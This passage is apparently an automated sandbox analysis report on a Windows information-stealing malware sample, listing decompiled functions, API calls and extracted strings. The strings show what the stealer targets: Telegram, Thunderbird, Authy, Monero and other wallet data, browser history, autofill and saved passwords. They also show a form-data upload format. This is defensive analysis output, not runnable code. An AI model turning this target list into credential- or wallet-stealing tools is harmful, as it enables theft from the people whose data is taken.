                                                                                                                                              • Part of subcall function 0040B49F: GetVersionExA.KERNEL32(?), ref: 0040B4D9
                                                                                                                                              • Part of subcall function 0040EBA8: LoadLibraryA.KERNEL32(?,00000000), ref: 0040EBD9
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000,004940CC), ref: 0040EBFA
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000), ref: 0040EC08
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000), ref: 0040EC16
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000), ref: 0040EC24
                                                                                                                                              • Part of subcall function 0040EBA8: GetProcAddress.KERNEL32(00000000), ref: 0040EC32
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$AddressProc__wgetenv$H_prolog3_memsetlstrcat$CreateDirectory$DeleteFile_memmove$H_prolog3_catch_LibraryLoadVersion__fsopen__getenv_helper_nolock__lock_strnlen
                                                                                                                                            • String ID: *.cookie$*.txt$APPDATA$D877F783D5D3EF8C*$LOCALAPPDATA$Thunderbird$\Telegram Desktop\$\Thunderbird\Profiles\$key_datas$map*
                                                                                                                                            • API String ID: 3974311532-2658590742
                                                                                                                                            • Opcode ID: e0070a4cbb82217904fc4446d69d35bec54bf21f9d5cdf4ffb4fa765ee3a98bf
                                                                                                                                            • Instruction ID: bd5d4e87d0cc3200aa145b73fc4a39412a210cbf9218a9ffbabb42310620678e
                                                                                                                                            • Opcode Fuzzy Hash: e0070a4cbb82217904fc4446d69d35bec54bf21f9d5cdf4ffb4fa765ee3a98bf
                                                                                                                                            • Instruction Fuzzy Hash: D2F1E170600144AFCF06BF21DD569AE3F66EBA4308B05413FF905632B2CBBA5994DB5D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040AD74, Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 196fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040AD7B
                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000006C,00408A05,logs,?,00000001,00000000,00000001,00000000), ref: 0040AD9E
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040ADB2
                                                                                                                                            • CloseHandle.KERNEL32(00000001), ref: 0040ADC3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateH_prolog3_HandleSize
                                                                                                                                            • String ID: "$"; filename="$.$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
                                                                                                                                            • API String ID: 3151384386-4065671631
                                                                                                                                            • Opcode ID: 26f8fe84fa4a899b342d71696fab2225f6aa77ccf92813076c3cf33e7df74dbd
                                                                                                                                            • Instruction ID: a64d294be2f9be73e3a677942478b177f191f6db9a024cd1282a807f2c5207d6
                                                                                                                                            • Opcode Fuzzy Hash: 26f8fe84fa4a899b342d71696fab2225f6aa77ccf92813076c3cf33e7df74dbd
                                                                                                                                            • Instruction Fuzzy Hash: 22619331A40309AEDB01EBA5CD55EEEB7B8AF54704F10842FF402B71C1DBB85A558B6E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041150B, Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 413COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00411515
                                                                                                                                              • Part of subcall function 00408FBD: __EH_prolog3.LIBCMT ref: 00408FC4
                                                                                                                                              • Part of subcall function 0045F3B6: __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F3B6: FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                              • Part of subcall function 0045F3B6: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                              • Part of subcall function 00402B83: std::_Xinvalid_argument.LIBCPMT ref: 00402B9D
                                                                                                                                            • _fprintf.LIBCMT ref: 004117F6
                                                                                                                                            • _fprintf.LIBCMT ref: 00411806
                                                                                                                                            • _fprintf.LIBCMT ref: 00411869
                                                                                                                                            • _fprintf.LIBCMT ref: 00411879
                                                                                                                                            • _fprintf.LIBCMT ref: 004118BC
                                                                                                                                            • _fprintf.LIBCMT ref: 004118EB
                                                                                                                                            • _fprintf.LIBCMT ref: 004118FB
                                                                                                                                            • _fprintf.LIBCMT ref: 0041190B
                                                                                                                                            • _fprintf.LIBCMT ref: 0041191E
                                                                                                                                            • _fprintf.LIBCMT ref: 00411941
                                                                                                                                            • _fprintf.LIBCMT ref: 00411952
                                                                                                                                            • _fprintf.LIBCMT ref: 00411976
                                                                                                                                            • _fprintf.LIBCMT ref: 00411982
                                                                                                                                            • _fprintf.LIBCMT ref: 004119AB
                                                                                                                                            • _fprintf.LIBCMT ref: 004119BB
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$ByteCharFileFindMultiWide_memmove$FirstH_prolog3H_prolog3_H_prolog3_catch_NextXinvalid_argumentstd::_
                                                                                                                                            • String ID: FALSE
                                                                                                                                            • API String ID: 1663285408-4287395501
                                                                                                                                            • Opcode ID: f3c4a07498f3a5c22119174ae02892f46320dbfe469c1e63af8e720746cb05ae
                                                                                                                                            • Instruction ID: d8817c2f45956fe21c009ccbdc509ef746813985b197b6a60689134e34e19cbd
                                                                                                                                            • Opcode Fuzzy Hash: f3c4a07498f3a5c22119174ae02892f46320dbfe469c1e63af8e720746cb05ae
                                                                                                                                            • Instruction Fuzzy Hash: 36F12A71800218AADF25EB55CD95FEEBB78AB11304F5040EFE10AB21A1DB785F84CF69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045BDA9, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 185registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0045BDCB
                                                                                                                                              • Part of subcall function 0040E701: __EH_prolog3.LIBCMT ref: 0040E708
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000001,00000000,00000000,00000003,00000001,00481714,00000000,000000CC), ref: 0045BE49
                                                                                                                                            • RegEnumKeyExA.KERNEL32(?,?,?,0000000F,00000000,00000000,00000000,00000000), ref: 0045BE96
                                                                                                                                            • wsprintfA.USER32 ref: 0045BEBD
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0045BED1
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0045BEDE
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0045BEE7
                                                                                                                                              • Part of subcall function 0040E76B: __EH_prolog3.LIBCMT ref: 0040E772
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseH_prolog3Open$EnumH_prolog3_catch_memmovewsprintf
                                                                                                                                            • String ID: %s\%s$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                            • API String ID: 951852247-3586320934
                                                                                                                                            • Opcode ID: a81c58a5a160d68e83c3a6593dd4d3704e9748b6230662d8b1743eb4e677f22b
                                                                                                                                            • Instruction ID: 297589af1e687343784022c56325842e1bf8ebb594c9d5c896e69792da5cdab4
                                                                                                                                            • Opcode Fuzzy Hash: a81c58a5a160d68e83c3a6593dd4d3704e9748b6230662d8b1743eb4e677f22b
                                                                                                                                            • Instruction Fuzzy Hash: 10612BB280420CAFDB10EF95DD85EEEBBBCEB18314F50442BF505B6141DB385A49CBA8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00409816, Relevance: 23.2, APIs: 4, Strings: 9, Instructions: 411fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00409835
                                                                                                                                            • __wgetenv.LIBCMT ref: 00409849
                                                                                                                                              • Part of subcall function 00408FBD: __EH_prolog3.LIBCMT ref: 00408FC4
                                                                                                                                              • Part of subcall function 0045F3B6: __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F3B6: FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                              • Part of subcall function 0045F3B6: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0045EC2A
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0045EC4D
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 00409B48
                                                                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000001), ref: 00409C60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharFindH_prolog3MultiWide_memmove$CopyCreateDirectoryFirstH_prolog3_Next__wgetenv
                                                                                                                                            • String ID: LOCALAPPDATA$banlist$fee_estimates$governance$mempool$mncache$mnpayments$netfulfilled$peers
                                                                                                                                            • API String ID: 1477989549-2646380060
                                                                                                                                            • Opcode ID: 0e9d3be1fe0536d5fe472ce6bbab88db25c78a83242e92c59b01063014842efd
                                                                                                                                            • Instruction ID: 95244e3cdc6a859acfa96e1e5902a5dab8707cc75a71cce3abacb0e782227c9a
                                                                                                                                            • Opcode Fuzzy Hash: 0e9d3be1fe0536d5fe472ce6bbab88db25c78a83242e92c59b01063014842efd
                                                                                                                                            • Instruction Fuzzy Hash: D9F16FB240118CBEDB25EF95CD85EEF776CAF55308F10412BB906A7182EA785B08CB75
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004092BF, Relevance: 23.2, APIs: 4, Strings: 9, Instructions: 411fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 004092DE
                                                                                                                                            • __wgetenv.LIBCMT ref: 004092F2
                                                                                                                                              • Part of subcall function 00408FBD: __EH_prolog3.LIBCMT ref: 00408FC4
                                                                                                                                              • Part of subcall function 0045F3B6: __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F3B6: FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                              • Part of subcall function 0045F3B6: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0045EC2A
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0045EC4D
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 004095F1
                                                                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000001), ref: 00409709
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharFindH_prolog3MultiWide_memmove$CopyCreateDirectoryFirstH_prolog3_Next__wgetenv
                                                                                                                                            • String ID: APPDATA$banlist$fee_estimates$governance$mempool$mncache$mnpayments$netfulfilled$peers
                                                                                                                                            • API String ID: 1477989549-1297871447
                                                                                                                                            • Opcode ID: c0e26fe2de3a2042bcec942b8b2491c73b9ea4d72760bf898b543ceb348493b8
                                                                                                                                            • Instruction ID: ca327edb471784f7df0a7b6ef9c3963e08f778c0e7ec9677995542f313d9be0b
                                                                                                                                            • Opcode Fuzzy Hash: c0e26fe2de3a2042bcec942b8b2491c73b9ea4d72760bf898b543ceb348493b8
                                                                                                                                            • Instruction Fuzzy Hash: AAF16EB240118CBEDB25EF95CD85EEF776CAF55308F10412BB906A7182EA785B08CB75
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004111EE, Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 240fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041120D
                                                                                                                                            • __wgetenv.LIBCMT ref: 00411219
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                              • Part of subcall function 0045F3B6: __EH_prolog3_GS.LIBCMT ref: 0045F3C0
                                                                                                                                              • Part of subcall function 0045F3B6: FindFirstFileW.KERNEL32(00000000,?,00000298,0041126F,?), ref: 0045F3F9
                                                                                                                                              • Part of subcall function 0045F3B6: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 0045F48A
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 004112C5
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 004112FC
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                            • CopyFileW.KERNEL32(00000000,?,00000001), ref: 0041142B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharCreateDirectoryFindH_prolog3MultiWide$CopyFirstH_prolog3_Next__wgetenv
                                                                                                                                            • String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\files\Soft$\files\Soft\Authy$files\Soft\Authy
                                                                                                                                            • API String ID: 2019322786-2614104896
                                                                                                                                            • Opcode ID: 8450da1249ace056c5ce27389841ac3156b3904aeacef12df3e0f7ac697e44cf
                                                                                                                                            • Instruction ID: 3a0ba783c615e5d84539bc00e3ceb2532a2bb0265846597c4a42c8389c2cef6c
                                                                                                                                            • Opcode Fuzzy Hash: 8450da1249ace056c5ce27389841ac3156b3904aeacef12df3e0f7ac697e44cf
                                                                                                                                            • Instruction Fuzzy Hash: 0D914FB1800148EFDB25EF95CD95EEE77BCAF15308F00416EF909A7192EA785B08CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040B888, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 112filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset_sprintflstrcat
                                                                                                                                            • String ID: %s%s$Autofill\%s_%s.txt$\temp
                                                                                                                                            • API String ID: 2288810340-2986410175
                                                                                                                                            • Opcode ID: f2b770b064971f697d960a816c5022e4e93a9d38e59bf7f8c6cef97466e0eb21
                                                                                                                                            • Instruction ID: 2cbcbf67b73c327ea701e62034847b06ecdb03dd5490e82a94b6c1ae1efbde71
                                                                                                                                            • Opcode Fuzzy Hash: f2b770b064971f697d960a816c5022e4e93a9d38e59bf7f8c6cef97466e0eb21
                                                                                                                                            • Instruction Fuzzy Hash: DB3160B2904108ABEF21ABB5DC45EDE7BBCEF05314F20002FF505E7152EA795A458B69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040B9E3, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00481870,?,?), ref: 0040BA23
                                                                                                                                            • lstrcatA.KERNEL32(?,\temp), ref: 0040BA35
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040BA45
                                                                                                                                            • _memset.LIBCMT ref: 0040BA53
                                                                                                                                            • _sprintf.LIBCMT ref: 0040BA65
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040BB0F
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • _fprintf.LIBCMT ref: 0040BADA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
                                                                                                                                            • String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
                                                                                                                                            • API String ID: 440339207-2199967400
                                                                                                                                            • Opcode ID: abe2afe7f5c00522f92467c9fa23fe663657e33dd9e4a89dde71d3edd57a702f
                                                                                                                                            • Instruction ID: 85d4c6eeb4aa0f2bd0d95498af8b66f143fb64a5dc0f468290037f34e8ca8625
                                                                                                                                            • Opcode Fuzzy Hash: abe2afe7f5c00522f92467c9fa23fe663657e33dd9e4a89dde71d3edd57a702f
                                                                                                                                            • Instruction Fuzzy Hash: CA317272904108ABEF21AFB5DC85EEE7B7CEF05314F20003FF509E2152EA7996458B69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00404109, Relevance: 16.7, APIs: 11, Instructions: 152stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00404113
                                                                                                                                              • Part of subcall function 0040A51C: _memset.LIBCMT ref: 0040A52A
                                                                                                                                              • Part of subcall function 0040A51C: _strcpy_s.LIBCMT ref: 0040A540
                                                                                                                                              • Part of subcall function 0040A51C: _memset.LIBCMT ref: 0040A55B
                                                                                                                                            • _memset.LIBCMT ref: 00404147
                                                                                                                                            • _memset.LIBCMT ref: 00404155
                                                                                                                                            • _strtok.LIBCMT ref: 0040417B
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000394), ref: 0040419F
                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,00000010,?,?,?,?,?,?,?,00000394), ref: 004041C5
                                                                                                                                            • lstrcatA.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,?,00000394), ref: 004041E2
                                                                                                                                            • lstrcatA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,00000394), ref: 00404218
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000394), ref: 00404227
                                                                                                                                            • ShellExecuteA.SHELL32(00000000,00000000,?,00481714,00000000,00000000), ref: 004042D7
                                                                                                                                              • Part of subcall function 0040A5A6: _memset.LIBCMT ref: 0040A5B0
                                                                                                                                            • _strtok.LIBCMT ref: 004042F0
                                                                                                                                              • Part of subcall function 0046577D: __getptd.LIBCMT ref: 0046579B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memsetlstrcat$_strtok$ExecuteH_prolog3_Shell__getptd_strcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 230071149-0
                                                                                                                                            • Opcode ID: 94b4f5b8a44ab99c9f32d662e4c28494f0070c22ffc786e7ac0c8b0ee537ab78
                                                                                                                                            • Instruction ID: 96e93a77eacea972f3319e9d7fd63cea7b2c0324638fafde54e832b404e1821a
                                                                                                                                            • Opcode Fuzzy Hash: 94b4f5b8a44ab99c9f32d662e4c28494f0070c22ffc786e7ac0c8b0ee537ab78
                                                                                                                                            • Instruction Fuzzy Hash: 9B512DB190021CAEDB25EB61CD99EDE777CEB54744F0000EBA109A7191EB785F88CF69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00410864, Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 313COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0041086E
                                                                                                                                              • Part of subcall function 0045C174: GetUserNameA.ADVAPI32(?,?), ref: 0045C1A9
                                                                                                                                              • Part of subcall function 00410769: __EH_prolog3.LIBCMT ref: 00410770
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 00402B83: std::_Xinvalid_argument.LIBCPMT ref: 00402B9D
                                                                                                                                            • _fprintf.LIBCMT ref: 00410B2F
                                                                                                                                            • _fprintf.LIBCMT ref: 00410B49
                                                                                                                                            • _fprintf.LIBCMT ref: 00410B64
                                                                                                                                            • _fprintf.LIBCMT ref: 00410B7F
                                                                                                                                              • Part of subcall function 004027C0: std::_Xinvalid_argument.LIBCPMT ref: 004027D3
                                                                                                                                              • Part of subcall function 004027C0: _memmove.LIBCMT ref: 0040280E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fprintf$Xinvalid_argument_memmovestd::_$H_prolog3H_prolog3_NameUser
                                                                                                                                            • String ID: Host: %s$Login: %s$Password: %s$passwords.txt
                                                                                                                                            • API String ID: 87717484-979203823
                                                                                                                                            • Opcode ID: 555f3fc81854ca62faa55aa95f314bf46e0a861ab2a55f8b775357380a655441
                                                                                                                                            • Instruction ID: 6d784ca6b3c39e84f573986eed19b601b7e93efbda6f419d82299f27a247dd67
                                                                                                                                            • Opcode Fuzzy Hash: 555f3fc81854ca62faa55aa95f314bf46e0a861ab2a55f8b775357380a655441
                                                                                                                                            • Instruction Fuzzy Hash: 34B17E71C00108AFDB14EBA9CC91EEEB778EF15318F10856EE416B31D1EB745A89CB68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00460E1A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 00460E4F
                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 00460EC9
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00460EE5
                                                                                                                                            • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00460EF9
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00460F02
                                                                                                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00460F12
                                                                                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00460F30
                                                                                                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00460F40
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2979504256-3916222277
                                                                                                                                            • Opcode ID: fabf63c35e54d24b6ef9e0c41f4ee53554db6c76a7dca7677115fd9095b90387
                                                                                                                                            • Instruction ID: 269f3bc08c21247e5d3c1c10a5686726a46095848f91b2bf6eb8a11f14ee0734
                                                                                                                                            • Opcode Fuzzy Hash: fabf63c35e54d24b6ef9e0c41f4ee53554db6c76a7dca7677115fd9095b90387
                                                                                                                                            • Instruction Fuzzy Hash: 756113B1D00218AFDB28DFD5D881AAFBBB8EB08304F14442AE511E6260E7799D45CF55
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040905A, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 139filestringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00409079
                                                                                                                                            • _memset.LIBCMT ref: 0040908C
                                                                                                                                              • Part of subcall function 00408B9A: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00408BAE
                                                                                                                                              • Part of subcall function 00408B9A: HeapAlloc.KERNEL32(00000000), ref: 00408BB5
                                                                                                                                              • Part of subcall function 00408B9A: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00408BCE
                                                                                                                                              • Part of subcall function 00408B9A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 00408BE7
                                                                                                                                              • Part of subcall function 00408B9A: RegCloseKey.ADVAPI32(?), ref: 00408BF0
                                                                                                                                            • _sprintf.LIBCMT ref: 004090AA
                                                                                                                                            • lstrlenA.KERNEL32(00000001,?,?,?,?,?,?,?,0000001C), ref: 004090B6
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,00000000,00000001,00000002,?,?,?,?,?,?,?,?,?,?,0000001C), ref: 00409183
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040919E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3Heap$AllocCloseCopyCreateDirectoryFileOpenProcessQueryValue_memset_sprintflstrlen
                                                                                                                                            • String ID: SOFTWARE\monero-project\monero-core$\Monero\$wallet_path
                                                                                                                                            • API String ID: 6233314-1162651061
                                                                                                                                            • Opcode ID: b926180deef766242507fbd1fe824edd3652d2b1d16a124cf962b3cc0c8fd2a0
                                                                                                                                            • Instruction ID: f93be2799f1b15ff00a07e55b8a5b0fc075014b0fa804d813040caa2a204119c
                                                                                                                                            • Opcode Fuzzy Hash: b926180deef766242507fbd1fe824edd3652d2b1d16a124cf962b3cc0c8fd2a0
                                                                                                                                            • Instruction Fuzzy Hash: 0F41A0B150024CABDB14EF64CD89DDE37ACEF15314F50012FF916A31C2DA789A48C768
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0045C00C, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
